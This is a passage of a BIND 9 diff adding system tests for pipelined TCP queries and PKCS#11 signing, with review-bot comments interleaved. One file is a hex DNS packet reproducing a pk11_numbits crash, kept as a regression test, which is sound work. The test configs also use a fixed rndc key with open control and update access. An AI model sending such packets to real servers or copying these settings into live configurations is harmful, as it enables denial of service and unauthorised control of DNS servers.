+ dnssec-validation yes;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "exampleb" {
+ type primary;
+ file "exampleb.db";
+ allow-update { any; };
+};
diff --git a/bin/tests/system/pipelined/ns4/named.conf.in b/bin/tests/system/pipelined/ns4/named.conf.in
new file mode 100644
index 0000000..922cebd
--- /dev/null
+++ b/bin/tests/system/pipelined/ns4/named.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.4;
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ directory ".";
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ keep-response-order { 10.53.0.7/32; };
+ recursion yes;
+ dnssec-validation yes;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/pipelined/pipequeries.c b/bin/tests/system/pipelined/pipequeries.c
new file mode 100644
index 0000000..e158de1
--- /dev/null
+++ b/bin/tests/system/pipelined/pipequeries.c
@@ -0,0 +1,322 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +#include <inttypes.h> +#include <stdbool.h> +#include <stdlib.h> +#include <string.h> +#include <unistd.h> + +#include <isc/app.h> +#include <isc/base64.h> +#include <isc/commandline.h> +#include <isc/hash.h> +#include <isc/log.h> +#include <isc/managers.h> +#include <isc/mem.h> +#include <isc/net.h> +#include <isc/parseint.h> +#include <isc/platform.h> +#include <isc/print.h> +#include <isc/sockaddr.h> +#include <isc/socket.h> +#include <isc/task.h> +#include <isc/timer.h> +#include <isc/util.h> + +#include <dns/dispatch.h> +#include <dns/events.h> +#include <dns/fixedname.h> +#include <dns/message.h> +#include <dns/name.h> +#include <dns/rdataset.h> +#include <dns/request.h> +#include <dns/resolver.h> +#include <dns/result.h> +#include <dns/types.h> +#include <dns/view.h> + +#include <dst/result.h> + +#define CHECK(str, x) \ + { \ + if ((x) != ISC_R_SUCCESS) { \ + fprintf(stderr, "I:%s: %s\n", (str), \ + isc_result_totext(x)); \ + exit(-1); \ + } \ + } + +#define RUNCHECK(x) RUNTIME_CHECK((x) == ISC_R_SUCCESS) + +#define PORT 5300 +#define TIMEOUT 30 + +static isc_mem_t *mctx = NULL; +static dns_requestmgr_t *requestmgr = NULL; +static bool have_src = false; +static isc_sockaddr_t srcaddr; +static isc_sockaddr_t dstaddr; +static int onfly; + +static void +recvresponse(isc_task_t *task, isc_event_t *event) { + dns_requestevent_t *reqev = (dns_requestevent_t *)event; + isc_result_t result; + dns_message_t *query = NULL, *response = NULL; + isc_buffer_t outbuf; + char output[1024]; + + UNUSED(task); + + 
REQUIRE(reqev != NULL); + + if (reqev->result != ISC_R_SUCCESS) { + fprintf(stderr, "I:request event result: %s\n", + isc_result_totext(reqev->result)); + exit(-1); + } + + query = reqev->ev_arg; + + dns_message_create(mctx, DNS_MESSAGE_INTENTPARSE, &response); + + result = dns_request_getresponse(reqev->request, response, + DNS_MESSAGEPARSE_PRESERVEORDER); + CHECK("dns_request_getresponse", result); + + if (response->rcode != dns_rcode_noerror) { + result = ISC_RESULTCLASS_DNSRCODE + response->rcode; + fprintf(stderr, "I:response rcode: %s\n", + isc_result_totext(result)); + exit(-1); + } + if (response->counts[DNS_SECTION_ANSWER] != 1U) { + fprintf(stderr, "I:response answer count (%u!=1)\n", + response->counts[DNS_SECTION_ANSWER]); + } + + isc_buffer_init(&outbuf, output, sizeof(output)); + result = dns_message_sectiontotext( + response, DNS_SECTION_ANSWER, &dns_master_style_simple, + DNS_MESSAGETEXTFLAG_NOCOMMENTS, &outbuf); + CHECK("dns_message_sectiontotext", result); + printf("%.*s", (int)isc_buffer_usedlength(&outbuf), + (char *)isc_buffer_base(&outbuf)); + fflush(stdout); + + dns_message_detach(&query); + dns_message_detach(&response); + dns_request_destroy(&reqev->request); + isc_event_free(&event); + + if (--onfly == 0) { + isc_app_shutdown(); + } + return; +} + +static isc_result_t +sendquery(isc_task_t *task) { + dns_request_t *request = NULL; + dns_message_t *message = NULL; + dns_name_t *qname = NULL; + dns_rdataset_t *qrdataset = NULL; + isc_result_t result; + dns_fixedname_t queryname; + isc_buffer_t buf; + static char host[256]; + int c; + + c = scanf("%255s", host); + if (c == EOF) { + return (ISC_R_NOMORE); + } + + onfly++; + + dns_fixedname_init(&queryname); + isc_buffer_init(&buf, host, strlen(host)); + isc_buffer_add(&buf, strlen(host)); + result = dns_name_fromtext(dns_fixedname_name(&queryname), &buf, + dns_rootname, 0, NULL); + CHECK("dns_name_fromtext", result); + + dns_message_create(mctx, DNS_MESSAGE_INTENTRENDER, &message); + + 
message->opcode = dns_opcode_query; + message->flags |= DNS_MESSAGEFLAG_RD; + message->rdclass = dns_rdataclass_in; + message->id = (unsigned short)(random() & 0xFFFF); + + result = dns_message_gettempname(message, &qname); + CHECK("dns_message_gettempname", result); + + result = dns_message_gettemprdataset(message, &qrdataset); + CHECK("dns_message_gettemprdataset", result); + + dns_name_clone(dns_fixedname_name(&queryname), qname); + dns_rdataset_makequestion(qrdataset, dns_rdataclass_in, + dns_rdatatype_a); + ISC_LIST_APPEND(qname->list, qrdataset, link); + dns_message_addname(message, qname, DNS_SECTION_QUESTION); + + result = dns_request_createvia( + requestmgr, message, have_src ? &srcaddr : NULL, &dstaddr, -1, + DNS_REQUESTOPT_TCP | DNS_REQUESTOPT_SHARE, NULL, TIMEOUT, 0, 0, + task, recvresponse, message, &request); + CHECK("dns_request_create", result); + + return (ISC_R_SUCCESS); +} + +static void +sendqueries(isc_task_t *task, isc_event_t *event) { + isc_result_t result; + + isc_event_free(&event); + + do { + result = sendquery(task); + } while (result == ISC_R_SUCCESS); + + if (onfly == 0) { + isc_app_shutdown(); + } + return; +} + +int +main(int argc, char *argv[]) { + isc_sockaddr_t bind_any; + struct in_addr inaddr; + isc_result_t result; + isc_log_t *lctx = NULL; + isc_logconfig_t *lcfg = NULL; + isc_nm_t *netmgr = NULL; + isc_taskmgr_t *taskmgr = NULL; + isc_task_t *task = NULL; + isc_timermgr_t *timermgr = NULL; + isc_socketmgr_t *socketmgr = NULL; + dns_dispatchmgr_t *dispatchmgr = NULL; + unsigned int attrs, attrmask; + dns_dispatch_t *dispatchv4 = NULL; + dns_view_t *view = NULL; + uint16_t port = PORT; + int c; + + RUNCHECK(isc_app_start()); + + isc_commandline_errprint = false; + while ((c = isc_commandline_parse(argc, argv, "p:r:")) != -1) { + switch (c) { + case 'p': + result = isc_parse_uint16(&port, + isc_commandline_argument, 10); + if (result != ISC_R_SUCCESS) { + fprintf(stderr, "bad port '%s'\n", + isc_commandline_argument); + exit(1); 
+ } + break; + case 'r': + fprintf(stderr, "The -r option has been deprecated.\n"); + break; + case '?': + fprintf(stderr, "%s: invalid argument '%c'", argv[0], + c); + break; + default: + break; + } + } + + argc -= isc_commandline_index; + argv += isc_commandline_index; + POST(argv); + + if (argc > 0) { + have_src = true; + } + + dns_result_register(); + + isc_sockaddr_any(&bind_any); + + result = ISC_R_FAILURE; + if (inet_pton(AF_INET, "10.53.0.7", &inaddr) != 1) { + CHECK("inet_pton", result); + } + isc_sockaddr_fromin(&srcaddr, &inaddr, 0); + + result = ISC_R_FAILURE; + if (inet_pton(AF_INET, "10.53.0.4", &inaddr) != 1) { + CHECK("inet_pton", result); + } + isc_sockaddr_fromin(&dstaddr, &inaddr, port); + + isc_mem_create(&mctx); + + isc_log_create(mctx, &lctx, &lcfg); + + RUNCHECK(dst_lib_init(mctx, NULL)); + + RUNCHECK(isc_managers_create(mctx, 1, 0, &netmgr, &taskmgr)); + RUNCHECK(isc_task_create(taskmgr, 0, &task)); + + RUNCHECK(isc_timermgr_create(mctx, &timermgr)); + RUNCHECK(isc_socketmgr_create(mctx, &socketmgr)); + RUNCHECK(dns_dispatchmgr_create(mctx, &dispatchmgr)); + + attrs = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_MAKEQUERY | + DNS_DISPATCHATTR_IPV4; + attrmask = DNS_DISPATCHATTR_UDP | DNS_DISPATCHATTR_TCP | + DNS_DISPATCHATTR_IPV4 | DNS_DISPATCHATTR_IPV6; + RUNCHECK(dns_dispatch_getudp(dispatchmgr, socketmgr, taskmgr, + have_src ? 
&srcaddr : &bind_any, 4096, 4, + 2, 3, 5, attrs, attrmask, &dispatchv4)); + RUNCHECK(dns_requestmgr_create(mctx, timermgr, socketmgr, taskmgr, + dispatchmgr, dispatchv4, NULL, + &requestmgr)); + + RUNCHECK(dns_view_create(mctx, 0, "_test", &view)); + + RUNCHECK(isc_app_onrun(mctx, task, sendqueries, NULL)); + + (void)isc_app_run(); + + dns_view_detach(&view); + + dns_requestmgr_shutdown(requestmgr); + dns_requestmgr_detach(&requestmgr); + + dns_dispatch_detach(&dispatchv4); + dns_dispatchmgr_destroy(&dispatchmgr); + + isc_socketmgr_destroy(&socketmgr); + isc_timermgr_destroy(&timermgr); + + isc_task_shutdown(task); + isc_task_detach(&task); + isc_managers_destroy(&netmgr, &taskmgr); + + dst_lib_destroy(); + + isc_log_destroy(&lctx); + + isc_mem_destroy(&mctx); + + isc_app_finish(); + + return (0); +} diff --git a/bin/tests/system/pipelined/prereq.sh b/bin/tests/system/pipelined/prereq.sh new file mode 100644 index 0000000..aa97ae2 --- /dev/null +++ b/bin/tests/system/pipelined/prereq.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/pipelined/ref b/bin/tests/system/pipelined/ref new file mode 100644 index 0000000..fe123f6 --- /dev/null +++ b/bin/tests/system/pipelined/ref 
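Review bot: In main()'s option loop the `case '?'` branch prints `c`, which is always '?' there, so the message never names the rejected option; it also lacks a trailing newline and lets the program carry on with defaults. I would change it to `fprintf(stderr, "%s: invalid argument '%c'\n", argv[0], isc_commandline_option); exit(1);` so a mistyped flag fails the test run instead of silently querying port 5300. Two smaller points: `if (argc > 0) have_src = true;` makes any positional argument select the 10.53.0.7 source address and deserves a comment saying so, and the `CHECK("dns_request_create", result)` label in sendquery() does not match the `dns_request_createvia` call it follows.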
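Review bot: prereq.sh refuses to run the test unless `$PYTHON -c "import dns"` succeeds, but the only Python script added for this test in the visible part of the commit, ans5/ans.py, imports standard-library modules only. Unless another script outside this view needs dnspython, the test is skipped on hosts that could run it. I would reduce the check to `test -n "$PYTHON"` and adjust the message, or add a comment naming the script that needs the module.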
@@ -0,0 +1,8 @@
+a.examplea. 10.0.1.1
+a.exampleb. 10.0.2.1
+b.examplea. 10.0.1.2
+b.exampleb. 10.0.2.2
+c.examplea. 10.0.1.3
+c.exampleb. 10.0.2.3
+d.examplea. 10.0.1.4
+d.exampleb. 10.0.2.4
diff --git a/bin/tests/system/pipelined/refb b/bin/tests/system/pipelined/refb
new file mode 100644
index 0000000..a24c6bc
--- /dev/null
+++ b/bin/tests/system/pipelined/refb
@@ -0,0 +1,8 @@
+e.examplea. 10.0.1.5
+e.exampleb. 10.0.2.5
+f.examplea. 10.0.1.6
+f.exampleb. 10.0.2.6
+g.examplea. 10.0.1.7
+g.exampleb. 10.0.2.7
+h.examplea. 10.0.1.8
+h.exampleb. 10.0.2.8
diff --git a/bin/tests/system/pipelined/setup.sh b/bin/tests/system/pipelined/setup.sh
new file mode 100644
index 0000000..064230a
--- /dev/null
+++ b/bin/tests/system/pipelined/setup.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
diff --git a/bin/tests/system/pipelined/tests.sh b/bin/tests/system/pipelined/tests.sh
new file mode 100644
index 0000000..76383e8
--- /dev/null
+++ b/bin/tests/system/pipelined/tests.sh
@@ -0,0 +1,81 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +MDIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 + +echo_i "check pipelined TCP queries" +ret=0 +$PIPEQUERIES -p ${PORT} < input > raw || ret=1 +awk '{ print $1 " " $5 }' < raw > output +sort < output > output-sorted +$DIFF ref output-sorted || { ret=1 ; echo_i "diff sorted failed"; } +$DIFF ref output > /dev/null && { ret=1 ; echo_i "diff out of order failed"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check pipelined TCP queries using mdig" +ret=0 +$RNDCCMD 10.53.0.4 flush +sleep 1 +$MDIG $MDIGOPTS +noall +answer +vc -f input -b 10.53.0.4 @10.53.0.4 > raw.mdig +awk '{ print $1 " " $5 }' < raw.mdig > output.mdig +sort < output.mdig > output-sorted.mdig +$DIFF ref output-sorted.mdig || { ret=1 ; echo_i "diff sorted failed"; } +$DIFF ref output.mdig > /dev/null && { ret=1 ; echo_i "diff out of order failed"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check keep-response-order" +ret=0 +$RNDCCMD 10.53.0.4 flush +sleep 1 +$PIPEQUERIES -p ${PORT} ++ < inputb > rawb || ret=1 +awk '{ print $1 " " $5 }' < rawb > outputb +$DIFF refb outputb || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check keep-response-order using mdig" +ret=0 +$RNDCCMD 10.53.0.4 flush +sleep 1 +$MDIG $MDIGOPTS +noall +answer +vc -f inputb -b 10.53.0.7 @10.53.0.4 > rawb.mdig +awk '{ print $1 " " $5 }' < rawb.mdig > 
outputb.mdig +$DIFF refb outputb.mdig || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check mdig -4 -6" +ret=0 +$RNDCCMD 10.53.0.4 flush +sleep 1 +$MDIG $MDIGOPTS -4 -6 -f input @10.53.0.4 > output46.mdig 2>&1 && ret=1 +grep "only one of -4 and -6 allowed" output46.mdig > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check mdig -4 with an IPv6 server address" +ret=0 +$MDIG $MDIGOPTS -4 -f input @fd92:7065:b8e:ffff::2 > output4.mdig 2>&1 && ret=1 +grep "address family not supported" output4.mdig > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/pkcs11/2037-pk11_numbits-crash-test.pkt b/bin/tests/system/pkcs11/2037-pk11_numbits-crash-test.pkt new file mode 100644 index 0000000..09b06f0 --- /dev/null +++ b/bin/tests/system/pkcs11/2037-pk11_numbits-crash-test.pkt @@ -0,0 +1,20 @@ +edda 2800 0001 0000 0001 0000 0972 7361 +7368 6132 3536 0765 7861 6d70 6c65 0000 +0600 01c0 0c00 3000 0100 0001 2c01 0801 +0003 0803 0100 0100 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 0000 0000 0000 0000 0000 +0000 0000 0000 00 diff --git a/bin/tests/system/pkcs11/clean.sh b/bin/tests/system/pkcs11/clean.sh new file mode 100644 index 0000000..b790cd8 --- /dev/null 
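Review bot: None of the four `$RNDCCMD 10.53.0.4 flush` calls has its exit status checked, and both keep-response-order checks read the same `inputb` names, so if the flush before the mdig variant fails the answers may be served from cache and arrive in order without the ordering logic being exercised (inferred; the server configuration is not part of this hunk). Writing each call as `$RNDCCMD 10.53.0.4 flush || ret=1` makes a failed flush fail the check it belongs to. The two `$MDIG ... +vc` runs also lack the `|| ret=1` that the `$PIPEQUERIES` runs carry, so an mdig failure is only reported indirectly as "diff sorted failed".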
+++ b/bin/tests/system/pkcs11/clean.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+rm -f K* ns1/K* keyset-* dsset-* ns1/*.db ns1/*.signed ns1/*.jnl
+rm -f dig.out* pin upd.log* upd.cmd* pkcs11-list.out*
+rm -f ns1/*.ksk ns1/*.zsk ns1/named.memstats
+rm -f supported
+rm -f ns*/named.run ns*/named.lock ns*/named.conf
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/pkcs11/ns1/example.db.in b/bin/tests/system/pkcs11/ns1/example.db.in
new file mode 100644
index 0000000..8e06212
--- /dev/null
+++ b/bin/tests/system/pkcs11/ns1/example.db.in
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, You can obtain one at http://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns root (
+ 2000082401 ; serial
+ 1800 ; refresh (30 minutes)
+ 1800 ; retry (30 minutes)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+
+txt TXT "recursed"
+
diff --git a/bin/tests/system/pkcs11/ns1/named.conf.in b/bin/tests/system/pkcs11/ns1/named.conf.in
new file mode 100644
index 0000000..8f2687d
--- /dev/null
+++ b/bin/tests/system/pkcs11/ns1/named.conf.in
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+ notify no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
diff --git a/bin/tests/system/pkcs11/setup.sh b/bin/tests/system/pkcs11/setup.sh
new file mode 100644
index 0000000..274ccf6
--- /dev/null
+++ b/bin/tests/system/pkcs11/setup.sh
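Review bot: The `rndc_key` secret is a fixed literal and the second `controls` block admits `allow { any; }`, yet nothing in the file says that both are acceptable only because this is a test fixture bound to 10.53.0.1. A comment above the key would stop the block being copied into a real configuration, for example `/* Test fixture only: well-known key, never reuse outside the system tests. */`. A short remark on why an empty `controls` statement precedes the populated one would also help a reader who meets the two statements for the first time.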
@@ -0,0 +1,96 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -u + +echo_i "Generating keys for Native PKCS#11" >&2 + +infile=ns1/example.db.in + +printf '%s' "${HSMPIN:-1234}" > pin +PWD=$(pwd) + +copy_setports ns1/named.conf.in ns1/named.conf + +get_random() { + dd if=/dev/urandom bs=1 count=2 2>/dev/null | od -tu2 -An +} + +genpkcs() ( + alg="$1" + bits="$2" + label="$3" + id="$(get_random)" + + $PK11DEL -l "$label" -w0 >/dev/null || true + $PK11GEN -a "$alg" -b "$bits" -l "$label" -i "$id" >/dev/null +) + +keyfrlab() ( + alg="$1" + bits="$2" + label="$3" + zone="$4" + shift 4 + + $KEYFRLAB -a "$alg" -l "pkcs11:object=$label;pin-source=$PWD/pin" "$@" "$zone" +) + +genzsk() ( + genpkcs "$@" + keyfrlab "$@" +) + +genksk() ( + genpkcs "$@" + keyfrlab "$@" -f ksk +) + +algs= +for algbits in rsasha256:2048 rsasha512:2048 ecdsap256sha256:256 ecdsap384sha384:384 ed25519:256 ed448:456; do + alg=$(echo "$algbits" | cut -f 1 -d :) + bits=$(echo "$algbits" | cut -f 2 -d :) + zone="$alg.example" + zonefile="ns1/$alg.example.db" + if $SHELL "$SYSTEMTESTTOP/testcrypto.sh" "$alg"; then + echo "$alg" >> supported + algs="$algs$alg " + + zsk1=$(genzsk "$alg" "$bits" "pkcs11-$alg-zsk1" "$zone") + zsk2=$(genzsk "$alg" "$bits" "pkcs11-$alg-zsk2" "$zone") + ksk1=$(genksk "$alg" "$bits" "pkcs11-$alg-ksk1" "$zone") + ksk2=$(genksk "$alg" "$bits" "pkcs11-$alg-ksk2" "$zone") + + cat "$infile" "$zsk1.key" "$ksk1.key" > "$zonefile" + $SIGNER -a -P -g -o "$zone" "$zonefile" > /dev/null + cp "$zsk2.key" 
"ns1/$alg.zsk" + cp "$ksk2.key" "ns1/$alg.ksk" + mv "K$alg"* ns1/ + + cat >> ns1/named.conf <<EOF +zone "$alg.example." { + type primary; + file "$alg.example.db.signed"; + allow-update { any; }; +}; + +EOF + fi +done +echo_i "Generated keys for Native PKCS#11: $algs" diff --git a/bin/tests/system/pkcs11/tests.sh b/bin/tests/system/pkcs11/tests.sh new file mode 100644 index 0000000..e8d7cb6 --- /dev/null +++ b/bin/tests/system/pkcs11/tests.sh 
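Review bot: The token PIN is written with `printf '%s' "${HSMPIN:-1234}" > pin` under whatever umask the caller has, so on a shared build host the file holding a real `HSMPIN` can end up world-readable until clean.sh removes it. Creating it in a subshell with a restrictive mask, `( umask 077; printf '%s' "${HSMPIN:-1234}" > pin )`, closes that window. The next line, `PWD=$(pwd)`, overwrites a variable the shell maintains itself; a private name such as `pindir=$(pwd)` used in `pin-source=$pindir/pin` avoids surprising anything sourced from conf.sh. `get_random` draws only two bytes, so the `-i` ids passed to `$PK11GEN` come from a 16-bit space and two keys can in principle receive the same id.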
@@ -0,0 +1,149 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +count_rrsigs() ( + grep -c "IN[[:space:]]*RRSIG" "$@" || true +) + +dig_with_opts() ( + $DIG +tcp +noadd +nosea +nostat +nocmd +dnssec -p "$PORT" "$@" +) + +dig_for_rr() ( + alg=$1 + rrtype=$2 + count0=$3 + dig_with_opts "$alg.example." @10.53.0.1 "$rrtype" > "dig.out.$rrtype.$alg" && + count=$(count_rrsigs "dig.out.$rrtype.$alg") && + test "$count" -gt "$count0" +) + +test_done() { + if [ $ret -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + ret=0 +} + +status=0 +ret=0 + +n=0 +while read -r alg; do + zonefile=ns1/$alg.example.db + echo_i "testing PKCS#11 key generation ($alg)" + count=$($PK11LIST | grep -c "pkcs11-$alg-ksk" || true) + [ "$count" -eq 4 ] || ret=1 + test_done + + echo_i "testing offline signing with PKCS#11 keys ($alg)" + + count=$(grep -c "[0-9][[:space:]]*RRSIG" "$zonefile.signed") + [ "$count" -eq 9 ] || ret=1 + test_done + + echo_i "testing inline signing with new PKCS#11 ZSK ($alg)" + + dig_with_opts "$alg.example." @10.53.0.1 "SOA" > "dig.out.SOA.$alg.0" || ret=1 + countSOA0=$(count_rrsigs "dig.out.SOA.$alg.0") + new_zsk=$(grep -v ';' "ns1/$alg.zsk") + + cat > "upd.cmd.ZSK.$alg" <<EOF +server 10.53.0.1 $PORT +ttl 300 +zone $alg.example. 
+update add $new_zsk +send +EOF + + $NSUPDATE -v > "upd.log.ZSK.$alg" < "upd.cmd.ZSK.$alg" || ret=1 + + retry_quiet 20 dig_for_rr "$alg" "SOA" "$countSOA0" || ret=1 + test_done + + echo_i "testing inline signing with new PKCS#11 KSK ($alg)" + + dig_with_opts "$alg.example." @10.53.0.1 "DNSKEY" > "dig.out.DNSKEY.$alg.0" || ret=1 + countDNSKEY0=$(count_rrsigs "dig.out.DNSKEY.$alg.0") + new_ksk=$(grep -v ';' "ns1/$alg.ksk") + + cat > "upd.cmd.KSK.$alg" <<EOF +server 10.53.0.1 $PORT +ttl 300 +zone $alg.example. +update add $new_ksk +send +EOF + + $NSUPDATE -v > "upd.log.KSK.$alg" < "upd.cmd.KSK.$alg" || ret=1 + + retry_quiet 20 dig_for_rr "$alg" "DNSKEY" "$countDNSKEY0" || ret=1 + test_done + + echo_i "testing PKCS#11 key destroy ($alg)" + + # Lookup all existing keys + echo_i "looking up all existing keys ($alg)" + $PK11LIST > "pkcs11-list.out.id.$alg" || ret=1 + test_done + + echo_i "destroying key with 'pkcs11-$alg-ksk1' label ($alg)" + $PK11DEL -l "pkcs11-$alg-ksk1" > /dev/null 2>&1 || ret=1 + test_done + + echo_i "destroying key with 'pkcs11-$alg-zsk1' label ($alg)" + $PK11DEL -l "pkcs11-$alg-zsk1" > /dev/null 2>&1 || ret=1 + test_done + + id=$(awk -v label="'pkcs11-$alg-ksk2'" '{ if ($7 == label) { print $9; exit; } }' < "pkcs11-list.out.id.$alg") + echo_i "destroying key with $id id ($alg)" + if [ -n "$id" ]; then + $PK11DEL -i "$id" > /dev/null 2>&1 || ret=1 + else + ret=1 + fi + test_done + + id=$(awk -v label="'pkcs11-$alg-zsk2'" '{ if ($7 == label) { print $9; exit; } }' < "pkcs11-list.out.id.$alg") + echo_i "destroying key with $id id ($alg)" + if [ -n "$id" ]; then + $PK11DEL -i "$id" > /dev/null 2>&1 || ret=1 + else + ret=1 + fi + test_done + + echo_i "checking if all keys have been destroyed ($alg)" + $PK11LIST > "pkcs11-list.out.$alg" || ret=1 + 